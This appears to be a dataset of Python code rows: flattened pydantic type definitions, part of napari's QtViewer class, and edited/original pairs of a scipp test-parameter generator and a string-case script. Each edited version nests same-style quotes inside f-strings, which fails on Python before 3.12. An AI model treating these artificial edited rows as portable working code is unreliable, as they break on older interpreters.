True class ConstrainedFloat(float, metaclass=ConstrainedNumberMeta): strict: bool = False gt: OptionalIntFloat = None ge: OptionalIntFloat = None lt: OptionalIntFloat = None le: OptionalIntFloat = None multiple_of: OptionalIntFloat = None @classmethod def __modify_schema__(cls, 
field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) # Modify constraints to account for differences between IEEE floats and JSON if field_schema.get('exclusiveMinimum') == -math.inf: del field_schema['exclusiveMinimum'] if field_schema.get('minimum') == -math.inf: del field_schema['minimum'] if field_schema.get('exclusiveMaximum') == math.inf: del field_schema['exclusiveMaximum'] if field_schema.get('maximum') == math.inf: del field_schema['maximum'] @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_float_validator if cls.strict else float_validator yield number_size_validator yield number_multiple_validator def confloat( *, strict: bool = False, gt: float = None, ge: float = None, lt: float = None, le: float = None, multiple_of: float = None, ) -> Type[float]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strict=strict, gt=gt, ge=ge, lt=lt, le=le, multiple_of=multiple_of) return type('ConstrainedFloatValue', (ConstrainedFloat,), namespace) class PositiveFloat(ConstrainedFloat): gt = 0 class NegativeFloat(ConstrainedFloat): lt = 0 class StrictFloat(ConstrainedFloat): strict = True class ConstrainedDecimal(Decimal, metaclass=ConstrainedNumberMeta): gt: OptionalIntFloatDecimal = None ge: OptionalIntFloatDecimal = None lt: OptionalIntFloatDecimal = None le: OptionalIntFloatDecimal = None max_digits: OptionalInt = None decimal_places: OptionalInt = None multiple_of: OptionalIntFloatDecimal = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield decimal_validator yield number_size_validator yield number_multiple_validator yield cls.validate @classmethod def validate(cls, value: Decimal) -> Decimal: digit_tuple, exponent = value.as_tuple()[1:] if exponent in {'F', 'n', 'N'}: raise errors.DecimalIsNotFiniteError() if exponent >= 0: # A positive exponent adds that many trailing zeros. digits = len(digit_tuple) + exponent decimals = 0 else: # If the absolute value of the negative exponent is larger than the # number of digits, then it's the same as the number of digits, # because it'll consume all of the digits in digit_tuple and then # add abs(exponent) - len(digit_tuple) leading zeros after the # decimal point. 
if abs(exponent) > len(digit_tuple): digits = decimals = abs(exponent) else: digits = len(digit_tuple) decimals = abs(exponent) whole_digits = digits - decimals if cls.max_digits is not None and digits > cls.max_digits: raise errors.DecimalMaxDigitsError(max_digits=cls.max_digits) if cls.decimal_places is not None and decimals > cls.decimal_places: raise errors.DecimalMaxPlacesError(decimal_places=cls.decimal_places) if cls.max_digits is not None and cls.decimal_places is not None: expected = cls.max_digits - cls.decimal_places if whole_digits > expected: raise errors.DecimalWholeDigitsError(whole_digits=expected) return value def condecimal( *, gt: Decimal = None, ge: Decimal = None, lt: Decimal = None, le: Decimal = None, max_digits: int = None, decimal_places: int = None, multiple_of: Decimal = None, ) -> Type[Decimal]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict( gt=gt, ge=ge, lt=lt, le=le, max_digits=max_digits, decimal_places=decimal_places, multiple_of=multiple_of ) return type('ConstrainedDecimalValue', (ConstrainedDecimal,), namespace) class UUID1(UUID): _required_version = 1 @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', format=f'uuid{cls._required_version}') class UUID3(UUID1): _required_version = 3 class UUID4(UUID1): _required_version = 4 class UUID5(UUID1): _required_version = 5 class FilePath(Path): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(format='file-path') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield path_validator yield path_exists_validator yield cls.validate @classmethod def validate(cls, value: Path) -> Path: if not value.is_file(): raise errors.PathNotAFileError(path=value) return value class DirectoryPath(Path): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(format='directory-path') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield path_validator yield path_exists_validator yield cls.validate @classmethod def validate(cls, value: Path) -> Path: if not value.is_dir(): raise errors.PathNotADirectoryError(path=value) return value class JsonWrapper: pass class JsonMeta(type): def __getitem__(self, t: Type[Any]) -> Type[JsonWrapper]: return type('JsonWrapperValue', (JsonWrapper,), {'inner_type': t}) class Json(metaclass=JsonMeta): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', format='json-string') class SecretStr: @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', writeOnly=True, format='password') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> 'SecretStr': if isinstance(value, cls): return value value = str_validator(value) return cls(value) def __init__(self, value: str): self._secret_value = value def __repr__(self) -> str: return f"SecretStr('{self}')" def __str__(self) -> str: return '**********' if self._secret_value else '' def __eq__(self, other: Any) -> bool: return isinstance(other, SecretStr) and self.get_secret_value() == other.get_secret_value() def display(self) -> str: warnings.warn('`secret_str.display()` is deprecated, use `str(secret_str)` instead', DeprecationWarning) return str(self) def get_secret_value(self) -> str: return self._secret_value class SecretBytes: @classmethod def 
__modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', writeOnly=True, format='password') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> 'SecretBytes': if isinstance(value, cls): return value value = bytes_validator(value) return cls(value) def __init__(self, value: bytes): self._secret_value = value def __repr__(self) -> str: return f"SecretBytes(b'{self}')" def __str__(self) -> str: return '**********' if self._secret_value else '' def __eq__(self, other: Any) -> bool: return isinstance(other, SecretBytes) and self.get_secret_value() == other.get_secret_value() def display(self) -> str: warnings.warn('`secret_bytes.display()` is deprecated, use `str(secret_bytes)` instead', DeprecationWarning) return str(self) def get_secret_value(self) -> bytes: return self._secret_value class PaymentCardBrand(str, Enum): amex = 'American Express' mastercard = 'Mastercard' visa = 'Visa' other = 'other' def __str__(self) -> str: return self.value class PaymentCardNumber(str): """ Based on: https://en.wikipedia.org/wiki/Payment_card_number """ strip_whitespace: ClassVar[bool] = True min_length: ClassVar[int] = 12 max_length: ClassVar[int] = 19 bin: str last4: str brand: PaymentCardBrand def __init__(self, card_number: str): self.bin = card_number[:6] self.last4 = card_number[-4:] self.brand = self._get_brand(card_number) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield str_validator yield constr_strip_whitespace yield constr_length_validator yield cls.validate_digits yield cls.validate_luhn_check_digit yield cls yield cls.validate_length_for_brand @property def masked(self) -> str: num_masked = len(self) - 10 # len(bin) + len(last4) == 10 return f'{self.bin}{"*" * num_masked}{self.last4}' @classmethod def validate_digits(cls, card_number: str) -> str: if not card_number.isdigit(): raise errors.NotDigitError return card_number @classmethod def validate_luhn_check_digit(cls, card_number: str) -> str: """ Based on: https://en.wikipedia.org/wiki/Luhn_algorithm """ sum_ = int(card_number[-1]) length = len(card_number) parity = length % 2 for i in range(length - 1): digit = int(card_number[i]) if i % 2 == parity: digit *= 2 if digit > 9: digit -= 9 sum_ += digit valid = sum_ % 10 == 0 if not valid: raise errors.LuhnValidationError return card_number @classmethod def validate_length_for_brand(cls, card_number: 'PaymentCardNumber') -> 'PaymentCardNumber': """ Validate length based on BIN for major brands: https://en.wikipedia.org/wiki/Payment_card_number#Issuer_identification_number_(IIN) """ required_length: Optional[int] = None if card_number.brand in {PaymentCardBrand.visa, PaymentCardBrand.mastercard}: required_length = 16 valid = len(card_number) == required_length elif card_number.brand == PaymentCardBrand.amex: required_length = 15 valid = len(card_number) == required_length else: valid = True if not valid: raise errors.InvalidLengthForBrand(brand=card_number.brand, required_length=required_length) return card_number @staticmethod def _get_brand(card_number: str) -> PaymentCardBrand: if card_number[0] == '4': brand = PaymentCardBrand.visa elif 51 <= int(card_number[:2]) <= 55: brand = PaymentCardBrand.mastercard elif card_number[:2] in {'34', '37'}: brand = PaymentCardBrand.amex else: brand = PaymentCardBrand.other return brand BYTE_SIZES = { 'b': 1, 'kb': 10 ** 3, 'mb': 10 ** 6, 'gb': 10 ** 9, 'tb': 10 ** 12, 'pb': 10 ** 15, 'eb': 10 ** 18, 'kib': 2 ** 10, 
'mib': 2 ** 20, 'gib': 2 ** 30, 'tib': 2 ** 40, 'pib': 2 ** 50, 'eib': 2 ** 60, } BYTE_SIZES.update({k.lower()[0]: v for k, v in BYTE_SIZES.items() if 'i' not in k}) byte_string_re = re.compile(r'^\s*(\d*\.?\d+)\s*(\w+)?', re.IGNORECASE) class ByteSize(int): @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, v: StrIntFloat) -> 'ByteSize': try: return cls(int(v)) except ValueError: pass str_match = byte_string_re.match(str(v)) if str_match is None: raise errors.InvalidByteSize() scalar, unit = str_match.groups() if unit is None: unit = 'b' try: unit_mult = BYTE_SIZES[unit.lower()] except KeyError: raise errors.InvalidByteSizeUnit(unit=unit) return cls(int(float(scalar) * unit_mult)) def human_readable(self, decimal: bool = False) -> str: if decimal: divisor = 1000 units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'] final_unit = 'EB' else: divisor = 1024 units = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB'] final_unit = 'EiB' num = float(self) for unit in units: if abs(num) < divisor: return f'{num:0.1f}{unit}' num /= divisor return f'{num:0.1f}{final_unit}' def to(self, unit: str) -> float: try: unit_div = BYTE_SIZES[unit.lower()] except KeyError: raise errors.InvalidByteSizeUnit(unit=unit) return self / unit_div
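The two pydantic rows above differ in the quoting inside the f-string in `PaymentCardNumber.masked`. As a quick illustration of one of the dumped types, here is a usage sketch of `ByteSize`; it assumes pydantic v1 is installed, and the `Download` model is illustrative, not from the dataset:

# Usage sketch for the ByteSize type defined above (assumes pydantic v1).
from pydantic import BaseModel, ByteSize

class Download(BaseModel):
    size: ByteSize

d = Download(size='1.5 GiB')
print(int(d.size))              # 1610612736
print(d.size.human_readable())  # 1.5GiB
print(d.size.to('MB'))          # 1610.612736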
edited_code:

# SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2021 Scipp contributors (https://github.com/scipp)
"""
This script generates input parameters to test whether arithmetic operations
are consistent with Python.
It takes the output file as its only command line argument.
"""
from itertools import product
import sys

import numpy as np


def format_number(x):
    if np.isposinf(x):
        return 'INFINITY'
    if np.isneginf(x):
        return '-INFINITY'
    if np.isnan(x):
        return f'{'-' if np.sign(x) == -1 else ''}NAN'
    return f'{x}'


def build_param(a, b):
    # implement behavior of numpy 1.20
    sign = -1 if np.sign(a) == -1 or np.sign(b) == -1 else 1
    fd = sign * np.inf if ((isinstance(a, float) or isinstance(b, float)) and b == 0 and a != 0) \
        else np.floor_divide(a, b)
    return f'Params{{{a}, {b}, {format_number(np.true_divide(a, b))},' + \
           f' {format_number(fd)}, {format_number(np.remainder(a, b))}}}'


def gen_values(dtype):
    return np.r_[np.arange(3, -4, -1), np.random.uniform(-10, 10, 5)] \
        .astype(dtype)


def main():
    np.random.seed(14653503)
    with open(sys.argv[1], 'w') as outf:
        outf.write('// SPDX-License-Identifier: BSD-3-Clause\n')
        outf.write('// Copyright (c) 2021 Scipp contributors '
                   '(https://github.com/scipp)\n')
        outf.write('// clang-format off\n')
        outf.write('/*\n')
        outf.write(' * This file was automatically generated\n')
        outf.write(' * DO NOT CHANGE!\n')
        outf.write(' */\n\n')
        outf.write('#include <array>\n\n')
        outf.write('#include <cmath>\n\n')
        outf.write('namespace {\n')
        name_and_dtype = (("int", int), ("float", float))
        for (a_name, a_dtype), (b_name, b_dtype) in product(name_and_dtype,
                                                            name_and_dtype):
            outf.write('template <class Params>\n')
            outf.write('constexpr inline auto '
                       f'division_params_{a_name}_{b_name} = std::array{{\n')
            for a, b in product(gen_values(a_dtype), gen_values(b_dtype)):
                outf.write(build_param(a, b) + ',\n')
            outf.write('};\n')
        outf.write('} // namespace\n')
        outf.write('// clang-format on\n')


if __name__ == "__main__":
    main()
original_code:

# SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2021 Scipp contributors (https://github.com/scipp)
"""
This script generates input parameters to test whether arithmetic operations
are consistent with Python.
It takes the output file as its only command line argument.
"""
from itertools import product
import sys

import numpy as np


def format_number(x):
    if np.isposinf(x):
        return 'INFINITY'
    if np.isneginf(x):
        return '-INFINITY'
    if np.isnan(x):
        return f'{"-" if np.sign(x) == -1 else ""}NAN'
    return f'{x}'


def build_param(a, b):
    # implement behavior of numpy 1.20
    sign = -1 if np.sign(a) == -1 or np.sign(b) == -1 else 1
    fd = sign * np.inf if ((isinstance(a, float) or isinstance(b, float)) and b == 0 and a != 0) \
        else np.floor_divide(a, b)
    return f'Params{{{a}, {b}, {format_number(np.true_divide(a, b))},' + \
           f' {format_number(fd)}, {format_number(np.remainder(a, b))}}}'


def gen_values(dtype):
    return np.r_[np.arange(3, -4, -1), np.random.uniform(-10, 10, 5)] \
        .astype(dtype)


def main():
    np.random.seed(14653503)
    with open(sys.argv[1], 'w') as outf:
        outf.write('// SPDX-License-Identifier: BSD-3-Clause\n')
        outf.write('// Copyright (c) 2021 Scipp contributors '
                   '(https://github.com/scipp)\n')
        outf.write('// clang-format off\n')
        outf.write('/*\n')
        outf.write(' * This file was automatically generated\n')
        outf.write(' * DO NOT CHANGE!\n')
        outf.write(' */\n\n')
        outf.write('#include <array>\n\n')
        outf.write('#include <cmath>\n\n')
        outf.write('namespace {\n')
        name_and_dtype = (("int", int), ("float", float))
        for (a_name, a_dtype), (b_name, b_dtype) in product(name_and_dtype,
                                                            name_and_dtype):
            outf.write('template <class Params>\n')
            outf.write('constexpr inline auto '
                       f'division_params_{a_name}_{b_name} = std::array{{\n')
            for a, b in product(gen_values(a_dtype), gen_values(b_dtype)):
                outf.write(build_param(a, b) + ',\n')
            outf.write('};\n')
        outf.write('} // namespace\n')
        outf.write('// clang-format on\n')


if __name__ == "__main__":
    main()
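The generator's stated purpose is checking that C++ arithmetic matches Python; the same comparison can be spot-checked in Python directly. The operand values below are illustrative, not from the script:

# Spot check (not part of the generator): numpy's true_divide, floor_divide
# and remainder agree with Python's /, // and % on these sample operands.
import numpy as np

for a, b in [(3, 2), (-3, 2), (3.5, -2.0)]:
    assert np.true_divide(a, b) == a / b
    assert np.floor_divide(a, b) == a // b
    assert np.remainder(a, b) == a % b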
edited_code:

word = input("Enter a word: ")
print(f"The word in exchanged case is: {word.swapcase()}")
print("----------------------------------")
# upper case at even indices, lower at odd
alt_word = [word[i].upper() if not i % 2 else word[i].lower() for i in range(len(word))]
print(f"The word in alternating upper and lower case is: {"".join(alt_word)}")
print("----------------------------------")
# lower case at even indices, upper at odd
alt_word_2 = [word[i].lower() if not i % 2 else word[i].upper() for i in range(len(word))]
print(f"The word in alternating lower and upper case is: {"".join(alt_word_2)}")
print("----------------------------------")
half = int(len(word)/2)
upFirst = word[:half].upper() + word[half:].lower()
print(f"The word with an upshifted first half is: {upFirst}")
print("----------------------------------")
upSecond = word[:half].lower() + word[half:].upper()
print(f"The word with an upshifted second half is: {upSecond}")
print("----------------------------------")
original_code:

word = input("Enter a word: ")
print(f"The word in exchanged case is: {word.swapcase()}")
print("----------------------------------")
# upper case at even indices, lower at odd
alt_word = [word[i].upper() if not i % 2 else word[i].lower() for i in range(len(word))]
print(f"The word in alternating upper and lower case is: {''.join(alt_word)}")
print("----------------------------------")
# lower case at even indices, upper at odd
alt_word_2 = [word[i].lower() if not i % 2 else word[i].upper() for i in range(len(word))]
print(f"The word in alternating lower and upper case is: {''.join(alt_word_2)}")
print("----------------------------------")
half = int(len(word)/2)
upFirst = word[:half].upper() + word[half:].lower()
print(f"The word with an upshifted first half is: {upFirst}")
print("----------------------------------")
upSecond = word[:half].lower() + word[half:].upper()
print(f"The word with an upshifted second half is: {upSecond}")
print("----------------------------------")
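For instance, entering Banana prints bANANA (exchanged case), BaNaNa and bAnAnA (the two alternating forms), then BANana and banANA (the half-upshifted forms).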
import os.path from copy import copy from pathlib import Path import numpy as np from qtpy.QtCore import QCoreApplication, QSize, Qt from qtpy.QtGui import QCursor, QGuiApplication from qtpy.QtWidgets import ( QFileDialog, QMessageBox, QSplitter, QVBoxLayout, QWidget, ) from vispy.scene import ArcballCamera, PanZoomCamera, SceneCanvas from vispy.visuals.transforms import ChainTransform from ..resources import get_stylesheet from ..utils import perf from ..utils.interactions import ( ReadOnlyWrapper, mouse_move_callbacks, mouse_press_callbacks, mouse_release_callbacks, mouse_wheel_callbacks, ) from ..utils.io import imsave from ..utils.key_bindings import components_to_key_combo from ..utils.theme import template from .dialogs.qt_about_key_bindings import QtAboutKeyBindings from .dialogs.screenshot_dialog import ScreenshotDialog from .tracing.qt_performance import QtPerformance from .utils import QImg2array, circle_pixmap, square_pixmap from .widgets.qt_dims import QtDims from .widgets.qt_layerlist import QtLayerList from .widgets.qt_viewer_buttons import QtLayerButtons, QtViewerButtons from .widgets.qt_viewer_dock_widget import QtViewerDockWidget from .._vispy import VispyAxesVisual, create_vispy_visual # isort:skip class KeyModifierFilterSceneCanvas(SceneCanvas): """SceneCanvas overriding VisPy when mouse wheel events have modifiers.""" def _process_mouse_event(self, event): if event.type == 'mouse_wheel' and len(event.modifiers) > 0: return super()._process_mouse_event(event) class QtViewer(QSplitter): """Qt view for the napari Viewer model. Parameters ---------- viewer : napari.components.ViewerModel Napari viewer containing the rendered scene, layers, and controls. Attributes ---------- canvas : vispy.scene.SceneCanvas Canvas for rendering the current view. console : QtConsole iPython console terminal integrated into the napari GUI. controls : QtLayerControlsContainer Qt view for GUI controls. dims : napari.qt_dims.QtDims Dimension sliders; Qt View for Dims model. dockConsole : QtViewerDockWidget QWidget wrapped in a QDockWidget with forwarded viewer events. aboutKeybindings : QtAboutKeybindings Key bindings for the 'About' Qt dialog. dockLayerControls : QtViewerDockWidget QWidget wrapped in a QDockWidget with forwarded viewer events. dockLayerList : QtViewerDockWidget QWidget wrapped in a QDockWidget with forwarded viewer events. layerButtons : QtLayerButtons Button controls for napari layers. layers : QtLayerList Qt view for LayerList controls. layer_to_visual : dict Dictionary mapping napari layers with their corresponding vispy_layers. view : vispy scene widget View displayed by vispy canvas. Adds a vispy ViewBox as a child widget. viewer : napari.components.ViewerModel Napari viewer containing the rendered scene, layers, and controls. viewerButtons : QtViewerButtons Button controls for the napari viewer. 
""" raw_stylesheet = get_stylesheet() def __init__(self, viewer): from .layer_controls import QtLayerControlsContainer super().__init__() self.setAttribute(Qt.WA_DeleteOnClose) QCoreApplication.setAttribute( Qt.AA_UseStyleSheetPropagationInWidgetStyles, True ) self.viewer = viewer self.dims = QtDims(self.viewer.dims) self.controls = QtLayerControlsContainer(self.viewer) self.layers = QtLayerList(self.viewer.layers) self.layerButtons = QtLayerButtons(self.viewer) self.viewerButtons = QtViewerButtons(self.viewer) self._console = None layerList = QWidget() layerList.setObjectName('layerList') layerListLayout = QVBoxLayout() layerListLayout.addWidget(self.layerButtons) layerListLayout.addWidget(self.layers) layerListLayout.addWidget(self.viewerButtons) layerListLayout.setContentsMargins(8, 4, 8, 6) layerList.setLayout(layerListLayout) self.dockLayerList = QtViewerDockWidget( self, layerList, name='layer list', area='left', allowed_areas=['left', 'right'], ) self.dockLayerControls = QtViewerDockWidget( self, self.controls, name='layer controls', area='left', allowed_areas=['left', 'right'], ) self.dockConsole = QtViewerDockWidget( self, QWidget(), name='console', area='bottom', allowed_areas=['top', 'bottom'], shortcut='Ctrl+Shift+C', ) self.dockConsole.setVisible(False) # because the console is loaded lazily in the @getter, this line just # gets (or creates) the console when the dock console is made visible. self.dockConsole.visibilityChanged.connect( lambda visible: self.console if visible else None ) self.dockLayerControls.visibilityChanged.connect(self._constrain_width) self.dockLayerList.setMaximumWidth(258) self.dockLayerList.setMinimumWidth(258) self.dockPerformance = self._create_performance_dock_widget() # This dictionary holds the corresponding vispy visual for each layer self.layer_to_visual = {} self.viewerButtons.consoleButton.clicked.connect( self.toggle_console_visibility ) self.canvas = KeyModifierFilterSceneCanvas( keys=None, vsync=True, parent=self ) self.canvas.events.ignore_callback_errors = False self.canvas.events.draw.connect(self.dims.enable_play) self.canvas.native.setMinimumSize(QSize(200, 200)) self.canvas.context.set_depth_func('lequal') self.canvas.connect(self.on_mouse_move) self.canvas.connect(self.on_mouse_press) self.canvas.connect(self.on_mouse_release) self.canvas.connect(self.on_key_press) self.canvas.connect(self.on_key_release) self.canvas.connect(self.on_mouse_wheel) self.canvas.connect(self.on_draw) self.view = self.canvas.central_widget.add_view() self._update_camera() self.axes = VispyAxesVisual( self.viewer.axes, self.viewer.dims, parent=self.view.scene, order=1e6, ) main_widget = QWidget() main_layout = QVBoxLayout() main_layout.setContentsMargins(10, 22, 10, 2) main_layout.addWidget(self.canvas.native) main_layout.addWidget(self.dims) main_layout.setSpacing(10) main_widget.setLayout(main_layout) self.setOrientation(Qt.Vertical) self.addWidget(main_widget) self._last_visited_dir = str(Path.home()) self._cursors = { 'cross': Qt.CrossCursor, 'forbidden': Qt.ForbiddenCursor, 'pointing': Qt.PointingHandCursor, 'standard': QCursor(), } self._update_palette() self.viewer.events.interactive.connect(self._on_interactive) self.viewer.events.cursor.connect(self._on_cursor) self.viewer.events.reset_view.connect(self._on_reset_view) self.viewer.events.palette.connect(self._update_palette) self.viewer.layers.events.reordered.connect(self._reorder_layers) self.viewer.layers.events.added.connect(self._add_layer) 
self.viewer.layers.events.removed.connect(self._remove_layer) self.viewer.dims.events.camera.connect( lambda event: self._update_camera() ) # stop any animations whenever the layers change self.viewer.events.layers_change.connect(lambda x: self.dims.stop()) self.setAcceptDrops(True) def _create_performance_dock_widget(self): """Create the dock widget that shows performance metrics. """ if not perf.USE_PERFMON: return None return QtViewerDockWidget( self, QtPerformance(), name='performance', area='bottom', shortcut='Ctrl+Shift+P', ) @property def console(self): """QtConsole: iPython console terminal integrated into the napari GUI. """ if self._console is None: from .widgets.qt_console import QtConsole self.console = QtConsole({'viewer': self.viewer}) return self._console @console.setter def console(self, console): self._console = console self.dockConsole.widget = console self._update_palette() def _constrain_width(self, event): """Allow the layer controls to be wider, only if floated. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if self.dockLayerControls.isFloating(): self.controls.setMaximumWidth(700) else: self.controls.setMaximumWidth(220) def _add_layer(self, event): """When a layer is added, set its parent and order. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ layers = event.source layer = event.item vispy_layer = create_vispy_visual(layer) vispy_layer.node.parent = self.view.scene vispy_layer.order = len(layers) - 1 self.layer_to_visual[layer] = vispy_layer def _remove_layer(self, event): """When a layer is removed, remove its parent. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ layer = event.item vispy_layer = self.layer_to_visual[layer] vispy_layer.node.transforms = ChainTransform() vispy_layer.node.parent = None del vispy_layer self._reorder_layers(None) def _reorder_layers(self, event): """When the list is reordered, propagate changes to draw order. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ for i, layer in enumerate(self.viewer.layers): vispy_layer = self.layer_to_visual[layer] vispy_layer.order = i self.canvas._draw_order.clear() self.canvas.update() def _update_camera(self): """Update the viewer camera.""" if self.viewer.dims.ndisplay == 3: # Set a 3D camera if not isinstance(self.view.camera, ArcballCamera): self.view.camera = ArcballCamera(name="ArcballCamera", fov=0) # flip y-axis to have correct alignment # self.view.camera.flip = (0, 1, 0) self.view.camera.viewbox_key_event = viewbox_key_event self.viewer.reset_view() else: # Set 2D camera if not isinstance(self.view.camera, PanZoomCamera): self.view.camera = PanZoomCamera( aspect=1, name="PanZoomCamera" ) # flip y-axis to have correct alignment self.view.camera.flip = (0, 1, 0) self.view.camera.viewbox_key_event = viewbox_key_event self.viewer.reset_view() def _save_layers_dialog(self, selected=False): """Save layers (all or selected) to disk, using ``LayerList.save()``. Parameters ---------- selected : bool If True, only layers that are selected in the viewer will be saved. By default, all layers are saved. 
""" msg = '' if not len(self.viewer.layers): msg = "There are no layers in the viewer to save" elif selected and not len(self.viewer.layers.selected): msg = ( 'Please select one or more layers to save,' '\nor use "Save all layers..."' ) if msg: QMessageBox.warning(self, "Nothing to save", msg, QMessageBox.Ok) return filename, _ = QFileDialog.getSaveFileName( parent=self, caption=f'Save {'selected' if selected else 'all'} layers', directory=self._last_visited_dir, # home dir by default ) if filename: self.viewer.layers.save(filename, selected=selected) def screenshot(self, path=None): """Take currently displayed screen and convert to an image array. Parameters ---------- path : str Filename for saving screenshot image. Returns ------- image : array Numpy array of type ubyte and shape (h, w, 4). Index [0, 0] is the upper-left corner of the rendered region. """ img = QImg2array(self.canvas.native.grabFramebuffer()) if path is not None: imsave(path, img) # scikit-image imsave method return img def _screenshot_dialog(self): """Save screenshot of current display, default .png""" dial = ScreenshotDialog(self.screenshot, self, self._last_visited_dir) if dial.exec_(): self._last_visited_dir = os.path.dirname(dial.selectedFiles()[0]) def _open_files_dialog(self): """Add files from the menubar.""" filenames, _ = QFileDialog.getOpenFileNames( parent=self, caption='Select file(s)...', directory=self._last_visited_dir, # home dir by default ) if (filenames != []) and (filenames is not None): self.viewer.open(filenames) def _open_files_dialog_as_stack_dialog(self): """Add files as a stack, from the menubar.""" filenames, _ = QFileDialog.getOpenFileNames( parent=self, caption='Select files...', directory=self._last_visited_dir, # home dir by default ) if (filenames != []) and (filenames is not None): self.viewer.open(filenames, stack=True) def _open_folder_dialog(self): """Add a folder of files from the menubar.""" folder = QFileDialog.getExistingDirectory( parent=self, caption='Select folder...', directory=self._last_visited_dir, # home dir by default ) if folder not in {'', None}: self.viewer.open([folder]) def _on_interactive(self, event): """Link interactive attributes of view and viewer. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ self.view.interactive = self.viewer.interactive def _on_cursor(self, event): """Set the appearance of the mouse cursor. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ cursor = self.viewer.cursor if cursor == 'square': size = self.viewer.cursor_size # make sure the square fits within the current canvas if size < 8 or size > ( min(*self.viewer.window.qt_viewer.canvas.size) - 4 ): q_cursor = self._cursors['cross'] else: q_cursor = QCursor(square_pixmap(size)) elif cursor == 'circle': size = self.viewer.cursor_size q_cursor = QCursor(circle_pixmap(size)) else: q_cursor = self._cursors[cursor] self.canvas.native.setCursor(q_cursor) def _on_reset_view(self, event): """Reset view of the rendered scene. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. 
""" if isinstance(self.view.camera, ArcballCamera): quat = self.view.camera._quaternion.create_from_axis_angle( *event.quaternion ) self.view.camera._quaternion = quat self.view.camera.center = event.center self.view.camera.scale_factor = event.scale_factor else: # Assumes default camera has the same properties as PanZoomCamera self.view.camera.rect = event.rect def _update_palette(self, event=None): """Update the napari GUI theme.""" # template and apply the primary stylesheet themed_stylesheet = template( self.raw_stylesheet, **self.viewer.palette ) if self._console is not None: self.console._update_palette( self.viewer.palette, themed_stylesheet ) self.setStyleSheet(themed_stylesheet) self.canvas.bgcolor = self.viewer.palette['canvas'] self.viewer.axes.background_color = self.viewer.palette['canvas'] def toggle_console_visibility(self, event=None): """Toggle console visible and not visible. Imports the console the first time it is requested. """ # force instantiation of console if not already instantiated _ = self.console viz = not self.dockConsole.isVisible() # modulate visibility at the dock widget level as console is docakable self.dockConsole.setVisible(viz) if self.dockConsole.isFloating(): self.dockConsole.setFloating(True) self.viewerButtons.consoleButton.setProperty( 'expanded', self.dockConsole.isVisible() ) self.viewerButtons.consoleButton.style().unpolish( self.viewerButtons.consoleButton ) self.viewerButtons.consoleButton.style().polish( self.viewerButtons.consoleButton ) def show_key_bindings_dialog(self, event=None): dialog = QtAboutKeyBindings(self.viewer, parent=self) dialog.show() @property def _canvas2world_scale(self): """list: Scale factors from canvas pixels to world coordinates.""" if isinstance(self.view.camera, PanZoomCamera): return 1 / self.view.camera.transform.scale[0] elif isinstance(self.view.camera, ArcballCamera): # Note magic number 598 is empirically determined so that # Arcball camera and PanZoomCamera match scale_factor = self.view.camera.scale_factor / 598 return scale_factor else: raise ValueError( f'Camera type {type(self.view.camera)} not recognized' ) def _map_canvas2world(self, position): """Map position from canvas pixels into world coordinates. Parameters ---------- position : 2-tuple Position in canvas (x, y). Returns ------- coords : tuple Position in world coordinates, matches the total dimensionality of the viewer. """ nd = self.viewer.dims.ndisplay transform = self.view.camera.transform.inverse mapped_position = transform.map(list(position))[:nd] position_world_slice = mapped_position[::-1] position_world = copy(self.viewer.dims.point) for i, d in enumerate(self.viewer.dims.displayed): position_world[d] = position_world_slice[i] return tuple(position_world) @property def _canvas_corners_in_world(self): """Location of the corners of canvas in world coordinates. Returns ------- corners : 2-tuple Coordinates of top left and bottom right canvas pixel in the world. """ # Find corners of canvas in world coordinates top_left = self._map_canvas2world([0, 0]) bottom_right = self._map_canvas2world(self.canvas.size) return np.array([top_left, bottom_right]) def on_mouse_wheel(self, event): """Called whenever mouse wheel activated in canvas. 
